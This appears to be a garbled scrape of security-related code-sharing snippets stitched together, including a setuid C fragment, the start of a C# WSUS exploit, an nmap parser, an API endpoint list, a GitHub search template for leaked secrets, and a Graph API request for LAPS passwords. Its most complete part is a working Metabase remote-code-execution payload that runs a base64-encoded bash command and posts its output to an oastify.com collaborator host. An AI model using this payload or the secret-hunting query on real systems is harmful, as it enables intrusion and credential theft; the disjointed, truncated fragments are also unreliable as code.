user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {| using System; | |
| using System.IO; | |
| using System.Security.Cryptography; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| namespace hawktracewsus | |
| { | |
| class Program | |
| { | |
| static void Main() |
| #!/bin/bash | |
| # Check if an argument was provided | |
| if [ $# -eq 0 ]; then | |
| NMAP_XML_OUTPUT="/dev/stdin" | |
| else | |
| NMAP_XML_OUTPUT="$1" | |
| fi | |
| # Use xmllint to parse IP addresses and ports from the Nmap XML output |
user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {| TARGET="http://127.0.0.1:3000"; \ | |
| COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \ | |
| COMMAND="uname -a"; \ | |
| ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" | base64 | tr -d '\n' | sed 's/=/%3D/g'); \ | |
| SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" | jq -r '.["setup-token"]'); \ | |
| PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}|{base64,-d}|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \ | |
| curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate" |
| POST /api/v2/accounts | |
| GET /api/v2/activities?since=cstest | |
| GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest | |
| GET /api/v2/automations | |
| POST /api/v2/automations | |
| GET /api/v2/bookmarks | |
| POST /api/v2/bookmarks | |
| GET /api/v2/brands | |
| POST /api/v2/brands | |
| GET /api/v2/custom_objects |
I predict that this URL will be broken because the directory structure will change when the final round source code is released, as in previous years 😅 ↩
As a security professional, it is important to conduct thorough reconnaissance. With the increasing use of APIs, keeping access tokens and other API-related secrets secure has become paramount to preventing leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these exposures, I have created a comprehensive search list that uses powerful search syntax to look for thousands of leaked keys and secrets in a single query. A secret found this way has to be revoked and rotated by its owner, because removing it from the latest commit still leaves it in the repository history.
(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))
**1.
| GET /beta/deviceLocalCredentials/[DEVICE-ID]?$select=credentials HTTP/1.1 | |
| ocp-client-version: 1.0 | |
| client-request-id: 96cbfa59-dbfc-4a92-b261-7f77bd8f4b9b | |
| ocp-client-name: Get-LapsAADPassword Windows LAPS Cmdlet | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.22621; en-US) PowerShell/5.1.22621.963 Invoke-MgGraphRequest | |
| SdkVersion: graph-powershell/1.26.0, Graph-dotnet-1.25.1 | |
| FeatureFlag: 00000047 | |
| Cache-Control: no-store, no-cache | |
| Authorization: Bearer [AAD-JWT-HERE] | |
| Accept-Encoding: gzip |
| using System; | |
| using System.Collections.Generic; | |
| using System.DirectoryServices.Protocols; | |
| using System.Globalization; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Runtime.InteropServices.ComTypes; | |
| using System.Security.Policy; | |
| using System.Security.Principal; | |
| using System.Text; |
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Runtime.CompilerServices; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| namespace Test | |
| { | |
| // CCOB IS THE GOAT |